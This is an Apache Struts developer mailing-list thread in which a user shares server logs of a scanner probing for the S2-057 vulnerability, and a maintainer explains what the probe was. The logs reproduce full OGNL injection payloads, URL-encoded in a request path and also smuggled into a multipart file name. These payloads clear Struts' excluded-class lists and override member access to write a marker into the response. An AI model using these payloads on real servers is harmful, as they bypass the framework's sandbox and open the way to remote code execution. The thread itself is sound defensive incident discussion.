struts-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Greg Huber <gregh3...@gmail.com>
Subject Re: Not seen this attempt before?
Date Sun, 20 Jan 2019 18:10:49 GMT
OK, thanks, good work!  Did return 500 so looks damage was done.

from the logs
2019-01-18 18:13:33,218 WARN
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
JakartaMultiPartRequest:parse - Unable to parse request
org.apache.commons.fileupload.InvalidFileNameException: Invalid file name:
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest
()).(#res=@org.apache.struts2.ServletActionContext@getResponse
()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b
    at
org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187)
~[commons-fileupload-1.4.jar:1.4]
    at
org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253)
~[commons-fileupload-1.4.jar:1.4]
....
....
2019-01-18 18:13:35,032 WARN
org.apache.struts2.dispatcher.mapper.DefaultActionMapper
DefaultActionMapper:cleanupMethodName -
#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
,#req=@org.apache.struts2.ServletActionContext@getRequest
(),#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString
did not match allowed method names [a-zA-Z_]*[0-9]* - default method
execute will be used!

Cheers Greg

On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <lukaszlenart@apache.org> wrote:

> niedz., 20 sty 2019 o 13:02 Greg Huber <gregh3269@gmail.com> napisał(a):
> >
> > Any ideas?
> >
> > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> >
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> > HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action
> HTTP/1.1"
> > 200 2023 "-" "Auto Spider 1.0"
>
> I would say a robot is scanning Internet to find vulnerable sites and
> looks like it addresses the latest vulnerability with namespace
> evaluation
> https://cwiki.apache.org/confluence/display/WW/S2-057
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> For additional commands, e-mail: dev-help@struts.apache.org
>
>

Mime
  • Unnamed multipart/alternative (inline, None, 0 bytes)
View raw message